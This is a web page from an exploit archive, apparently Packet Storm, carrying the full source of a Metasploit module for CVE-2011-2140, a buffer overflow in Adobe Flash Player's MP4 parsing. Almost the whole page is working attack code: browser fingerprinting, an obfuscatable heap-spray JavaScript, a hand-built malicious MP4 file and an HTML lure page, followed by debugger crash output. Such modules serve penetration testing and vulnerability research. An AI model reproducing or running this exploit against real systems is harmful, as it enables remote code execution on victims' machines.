exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow

Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
Posted Feb 10, 2012
Authored by Abysssec, sinn3r, Alexander Gavrun | Site metasploit.com

This Metasploit module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild. Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn't included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable.

tags | exploit, remote, arbitrary, code execution
advisories | CVE-2011-2140, OSVDB-74439
SHA-256 | df9a4f147e437db061fcac07db067da65775ac9fff0ec5fecbe3b18c47f3ceba
Download | Favorite | View

Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx
        component.  When processing a MP4 file (specifically the Sequence Parameter Set),
        Flash will see if pic_order_cnt_type is equal to 1, which sets the
        num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in
        offset_for_ref_frame on the stack, which allows arbitrary remote code execution
        under the context of the user.  Numerous reports also indicate that this
        vulnerability has been exploited in the wild.

          Please note that the exploit requires a SWF media player in order to trigger
        the bug, which currently isn't included in the framework.  However, software such
        as Longtail SWF Player is free for non-commercial use, and is easily obtainable.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Alexander Gavrun', #RCA
          'Abysssec',         #PoC
          'sinn3r'            #Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2011-2140' ],
          [ 'OSVDB', '74439'],
          [ 'BID', '49083' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-276/' ],
          [ 'URL', 'http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/' ],
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-21.html' ],
          [ 'URL', 'http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html' ],
          [ 'URL', 'http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/' ]
        ],
      'Payload'        =>
        {
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500
        },
      'DefaultOptions'  =>
        {
          'ExitFunction'         => "seh",
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 6 on Windows XP SP3',         { 'Offset' => '0x600' } ], #0x5f4 = spot on
          [ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Aug 9 2011",
      'DefaultTarget'  => 0))

      register_options(
        [
          OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
          OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
        ], self.class)
  end

  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
      return targets[1]
    elsif agent =~ /MSIE 7/
      return targets[2]
    else
      return nil
    end
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    my_target = get_target(agent)

    # Avoid the attack if the victim doesn't have the same setup we're targeting
    if my_target.nil?
      print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
      send_not_found(cli)
      return
    end

    # The SWF requests our MP4 trigger
    if request.uri =~ /\.mp4$/
      print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
      #print_error("Sorry, not sending you the mp4 for now")
      #send_not_found(cli)
      send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
      return
    end

    # Set payload depending on target
    p = payload.encoded

    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

    js = <<-JS
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");

    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);

    heap_obj.gc();

    for (var i=1; i < 0x300; i++) {
      heap_obj.alloc(block);
    }
    JS

    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end

    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
    mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
    swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}"

    html = %Q|
    <html>
    <head>
    <script>
    #{js}
    </script>
    </head>
    <body>
    <object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">
    <param name="movie" value="#{swf_uri}">
    </object>
    </body>
    </html>
    |

    html = html.gsub(/^\t\t/, '')

    print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

  def exploit
    @mp4 = create_mp4
    super
  end

  def create_mp4
    ftypAtom = "\x00\x00\x00\x20"                   #Size
    ftypAtom << "ftypisom"
    ftypAtom << "\x00\x00\x02\x00"
    ftypAtom << "isomiso2avc1mp41"

    mdatAtom = "\x00\x00\x00\x10"                   #Size
    mdatAtom << "mdat"
    mdatAtom << "\x00\x00\x02\x8B\x06\x05\xFF\xFF"

    moovAtom1 = "\x00\x00\x08\x83"                  #Size
    moovAtom1 << "moov"                             #Move header box header
    moovAtom1 << "\x00\x00\x00"
    moovAtom1 << "lmvhd"                            # Type
    moovAtom1 << "\x00\x00\x00\x00"                 # Version/Flags
    moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
    moovAtom1 << "\x00\x00\x03\xE8"                 # Time scale
    moovAtom1 << "\x00\x00\x2F\x80"                 # Duration
    moovAtom1 << "\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    moovAtom1 << "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
    moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x02\xFA"
    moovAtom1 << "trak"                             # Track box header
    moovAtom1 << "\x00\x00\x00\x5C"
    moovAtom1 << "tkhd"
    moovAtom1 << "\x00\x00\x00\x0F"
    moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80"  # Creation time
    moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x2E\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    moovAtom1 << "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    moovAtom1 << "\x00\x00\x00\x00\x40\x00\x00\x00\x01\x42\x00\x00\x01\x42\x00\x00\x00\x00\x02"
    moovAtom1 << "rmdia"
    moovAtom1 << "\x00\x00\x00\x20"                  # Size
    moovAtom1 << "mdhd"                              # Media header box
    moovAtom1 << "\x00\x00\x00\x00"                  # Version/Flags
    moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80"  # Creation time
    moovAtom1 << "\x00\x00\x00\x01"                  # Time scale
    moovAtom1 << "\x00\x00\x00\x0C"                  # Duration
    moovAtom1 << "\x55\xC4\x00\x00"
    moovAtom1 << "\x00\x00\x00\x2D"                  # Size
    moovAtom1 << "hdlr"                              # Handler Reference header
    moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00"
    moovAtom1 << "vide"                              # Handler type
    moovAtom1 << "\x00\x00\x00\x00\x00"
    moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00"
    moovAtom1 << "VideoHandler"                      # Handler name
    moovAtom1 << "\x00\x00\x00\x02\x1D"
    moovAtom1 << "minf"
    moovAtom1 << "\x00\x00\x00\x14"
    moovAtom1 << "vmhd"
    moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24"
    moovAtom1 << "dinf"                              # Data information box header
    moovAtom1 << "\x00\x00\x00\x1c"
    moovAtom1 << "dref"                              # Data reference box
    moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"
    moovAtom1 << "\x00\x00\x00\x0C"                  # Size
    moovAtom1 << "url "                              # Data entry URL box
    moovAtom1 << "\x00\x00\x00\x01"                  # Location / version / flags
    moovAtom1 << "\x00\x00\x09\xDD"                  # Size
    moovAtom1 << "stbl"
    moovAtom1 << "\x00\x00\x08\x99"
    moovAtom1 << "stsd"
    moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"
    moovAtom1 << "\x00\x00\x08\x89"                  # Size
    moovAtom1 << "avc1"
    moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    moovAtom1 << "\x01\x42"                          # Width
    moovAtom1 << "\x01\x42"                          # Height
    moovAtom1 << "\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    moovAtom1 << "\x18"                              # Depth
    moovAtom1 << "\xFF\xFF"
    moovAtom1 << "\x00\x00\x08\x33"                  # Size
    moovAtom1 << "avcC"
    moovAtom1 << "\x01"                              # Config version
    moovAtom1 << "\x64"                              # Avc profile indication
    moovAtom1 << "\x00"                              # Compatibility
    moovAtom1 << "\x15"                              # Avc level indication
    moovAtom1 << "\xFF\xE1"

    # Although the fields have different values, they all become 0x0c0c0c0c
    # in memory.
    cycle =  "\x00\x00\x00"
    cycle << "\x30\x30\x30\x30"  #6th
    cycle << "\x00\x00\x00"
    cycle << "\x18\x18\x18\x18"  #7th
    cycle << "\x00\x00\x00"
    cycle << "\x0c\x0c\x0c\x0c"  #8th
    cycle << "\x00\x00\x00"
    cycle << "\x06\x06\x06\x06"  #1st
    cycle << "\x00\x00\x00"
    cycle << "\x03\x03\x03\x03"
    cycle << "\x00\x00\x00\x01\x81\x81\x81\x80\x00\x00\x00"
    cycle << "\xc0\xc0\xc0\xc0"  # 4th
    cycle << "\x00\x00\x00"
    cycle << "\x60\x60\x60\x60"

    spsunit =  "\x08\x1A\x67\x70\x34\x32\x74\x70\x00\x00\xAF\x88\x88\x84\x00\x00\x03\x00\x04\x00\x00\x03\x00\x3F\xFF\xFF\xFF\xFF\xFF"
    spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
    spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC"
    spsunit << cycle * 35
    spsunit << "\x00\x00\x00\x30\x30\x03\x03\x03\x03\x00\x00\x00\xB2\x2C"

    moovAtom2 = "\x00\x00\x00\x18"
    moovAtom2 << "stts"
    moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x01"
    moovAtom2 << "\x00\x00\x00\x14"
    moovAtom2 << "stss"
    moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
    moovAtom2 << "pctts"
    moovAtom2 << "\x00\x00\x00\x00\x00\x00"
    moovAtom2 << "\x00\x0C\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
    moovAtom2 << "\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x02"
    moovAtom2 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00"
    moovAtom2 << "\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x02"
    moovAtom2 << "\x00\x00\x00\x1C"
    moovAtom2 << "stsc"
    moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01"
    moovAtom2 << "\x00\x00\x00\x44"
    moovAtom2 << "stsz"
    moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    moovAtom2 << "\x0C\x00\x00\x2F\x8D\x00\x00\x0C\xFE\x00\x00\x04\x42\x00\x00\x0B\x20\x00\x00\x04\x58\x00\x00\x07\x19\x00\x00\x07"
    moovAtom2 << "\x63\x00\x00\x02\xD6\x00\x00\x03\xC1\x00\x00\x0A\xDF\x00\x00\x04\x9B\x00\x00\x09\x39"
    moovAtom2 << "\x00\x00\x00\x40"
    moovAtom2 << "stco"
    moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x0C\x00\x00\x00\x30\x00\x00\x2F\xBD\x00\x00\x3D\x8A\x00\x00\x48\x19\x00\x00\x5A\xF4"
    moovAtom2 << "\x00\x00\x66\x1F\x00\x00\x73\xEA\x00\x00\x82\x32\x00\x00\x8A\xFA\x00\x00\x95\x51\x00\x00\xA7\x16\x00\x00\xB1\xE5"

    moovAtom = moovAtom1 + spsunit + moovAtom2
    m = ftypAtom + mdatAtom + moovAtom
    return m
  end

end

=begin
C:\WINDOWS\system32\Macromed\Flash\Flash10u.ocx

Flash10u+0x5b4e8:
Missing image name, possible paged-out or corrupt data.
1f06b4e8 8901            mov     dword ptr [ecx],eax  ds:0023:020c0000=00905a4d
0:008> !exchain
020bfdfc: <Unloaded_ud.drv>+c0c0c0b (0c0c0c0c)

ECX points to 0x0c0c0c0c at the time of the crash:
0:008> r
eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
eip=0c0c0c0c esp=020befa8 ebp=020befc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050246
<Unloaded_ud.drv>+0xc0c0c0b:
0c0c0c0c ??              ???

Example of SWF player URI:
http://www.jeroenwijering.com/embed/mediaplayer.swf

To-do:
IE 8 target
=end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close